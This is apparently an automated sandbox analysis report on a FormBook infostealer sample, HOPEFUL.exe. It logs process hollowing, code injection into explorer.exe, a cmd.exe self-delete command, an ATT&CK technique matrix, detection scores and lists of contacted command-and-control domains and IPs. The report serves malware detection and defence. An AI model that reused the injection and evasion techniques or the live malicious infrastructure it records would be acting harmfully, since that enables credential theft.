Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 35.169.40.107 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.98.99.30 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 174.136.37.109 80	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\HOPEFUL.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\HOPEFUL.exe

Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1040000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\HOPEFUL.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: EB9008	Jump to behavior

Source: C:\Users\user\Desktop\HOPEFUL.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'			Jump to behavior

Source: explorer.exe, 0000000D.00000000.297448292.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.297975743.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000013.00000002.560064370.0000000003630000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\HOPEFUL.exe	Queries volume information: C:\Users\user\Desktop\HOPEFUL.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\HOPEFUL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Shared Modules1	Valid Accounts1	Valid Accounts1	Rootkit1	Credential API Hooking1	Security Software Discovery121	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation1	Masquerading1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection812	Valid Accounts1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Disable or Modify Tools1	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection812	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Deobfuscate/Decode Files or Information1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Obfuscated Files or Information3	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Software Packing1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
HOPEFUL.exe	31%	ReversingLabs	ByteCode-MSIL.Packed.Generic
HOPEFUL.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.the343radio.com/jqc/	0%	Avira URL Cloud	safe
http://www.novergi.com/jqc/	0%	Avira URL Cloud	safe
http://www.eaglesnestpropheticministry.com/jqc/	0%	Avira URL Cloud	safe
http://www.bebywye.site/jqc/www.ip-freight.com	0%	Avira URL Cloud	safe
http://www.the343radio.com	0%	Avira URL Cloud	safe
http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.weddingmustgoon.comReferer:	0%	Avira URL Cloud	safe
http://www.11sxsx.com/jqc/	0%	Avira URL Cloud	safe
http://www.registeredagentfirm.com/jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP	0%	Avira URL Cloud	safe
http://www.ip-freight.comReferer:	0%	Avira URL Cloud	safe
http://www.ip-freight.com/jqc/	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.eaglesnestpropheticministry.comReferer:	0%	Avira URL Cloud	safe
http://www.novergi.com	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.theorangepearl.com/jqc/	0%	Avira URL Cloud	safe
http://www.lhc965.com/jqc/	0%	Avira URL Cloud	safe
http://www.registeredagentfirm.comReferer:	0%	Avira URL Cloud	safe
http://www.weddingmustgoon.com/jqc/	0%	Avira URL Cloud	safe
http://www.internetmarkaching.com/jqc/	0%	Avira URL Cloud	safe
http://www.kenniscourtureconsignments.com	0%	Avira URL Cloud	safe
http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.weddingmustgoon.com	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.strahlenschutz.digital/jqc/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.internetmarkaching.comReferer:	0%	Avira URL Cloud	safe
http://www.tiendazoom.com/jqc/	0%	Avira URL Cloud	safe
http://www.topheadlinetowitness-today.infoReferer:	0%	Avira URL Cloud	safe
http://www.novergi.comReferer:	0%	Avira URL Cloud	safe
http://www.theorangepearl.com	0%	Avira URL Cloud	safe
http://www.novergi.com/jqc/M	0%	Avira URL Cloud	safe
http://www.tiendazoom.comReferer:	0%	Avira URL Cloud	safe
http://www.ip-freight.com/jqc/www.toweroflifeinc.com	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.theorangepearl.com/jqc/www.11sxsx.com	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.strahlenschutz.digitalReferer:	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.11sxsx.comReferer:	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.ip-freight.com	0%	Avira URL Cloud	safe
http://www.strahlenschutz.digital	0%	Avira URL Cloud	safe
http://www.topheadlinetowitness-today.info	0%	Avira URL Cloud	safe
http://www.toweroflifeinc.com/jqc/	0%	Avira URL Cloud	safe
http://www.topheadlinetowitness-today.info/jqc/	0%	Avira URL Cloud	safe
http://www.kenniscourtureconsignments.com/jqc/	0%	Avira URL Cloud	safe
http://www.bebywye.siteReferer:	0%	Avira URL Cloud	safe
http://www.lhc965.com	0%	Avira URL Cloud	safe
http://www.toweroflifeinc.comReferer:	0%	Avira URL Cloud	safe
http://www.bebywye.site/jqc/	0%	Avira URL Cloud	safe
http://www.bebywye.site	0%	Avira URL Cloud	safe
http://www.tiendazoom.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p	0%	Avira URL Cloud	safe
http://www.lhc965.comReferer:	0%	Avira URL Cloud	safe
http://www.the343radio.com/jqc/www.registeredagentfirm.com	0%	Avira URL Cloud	safe
http://www.toweroflifeinc.com	0%	Avira URL Cloud	safe
http://www.registeredagentfirm.com	0%	Avira URL Cloud	safe
http://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp	0%	Avira URL Cloud	safe
http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com	0%	Avira URL Cloud	safe
http://www.tiendazoom.com	0%	Avira URL Cloud	safe
http://www.11sxsx.com/jqc/www.lhc965.com	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com	0%	Avira URL Cloud	safe
http://www.kenniscourtureconsignments.comReferer:	0%	Avira URL Cloud	safe
http://www.registeredagentfirm.com/jqc/	0%	Avira URL Cloud	safe
http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
registeredagentfirm.com	34.98.99.30	true	true	unknown
tiendazoom.com	174.136.37.109	true	true	unknown
www.the343radio.com	35.169.40.107	true	true	unknown
eaglesnestpropheticministry.com	34.102.136.180	true	true	unknown
www.tiendazoom.com	unknown	unknown	true	unknown
www.registeredagentfirm.com	unknown	unknown	true	unknown
www.eaglesnestpropheticministry.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.registeredagentfirm.com/jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP	true	Avira URL Cloud: safe	unknown
http://www.tiendazoom.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p	true	Avira URL Cloud: safe	unknown
http://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.the343radio.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.novergi.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.eaglesnestpropheticministry.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.bebywye.site/jqc/www.ip-freight.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.the343radio.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.weddingmustgoon.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.11sxsx.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.ip-freight.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ip-freight.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.eaglesnestpropheticministry.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.novergi.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.theorangepearl.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lhc965.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.registeredagentfirm.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.weddingmustgoon.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internetmarkaching.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kenniscourtureconsignments.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.weddingmustgoon.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.strahlenschutz.digital/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.internetmarkaching.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiendazoom.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.topheadlinetowitness-today.infoReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.novergi.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.theorangepearl.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.novergi.com/jqc/M	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiendazoom.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ip-freight.com/jqc/www.toweroflifeinc.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.theorangepearl.com/jqc/www.11sxsx.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.strahlenschutz.digitalReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.11sxsx.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sakkal.com	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.ip-freight.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.strahlenschutz.digital	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.topheadlinetowitness-today.info	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.toweroflifeinc.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.topheadlinetowitness-today.info/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kenniscourtureconsignments.com/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bebywye.siteReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lhc965.com	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.toweroflifeinc.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bebywye.site/jqc/	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bebywye.site	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lhc965.comReferer:	explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
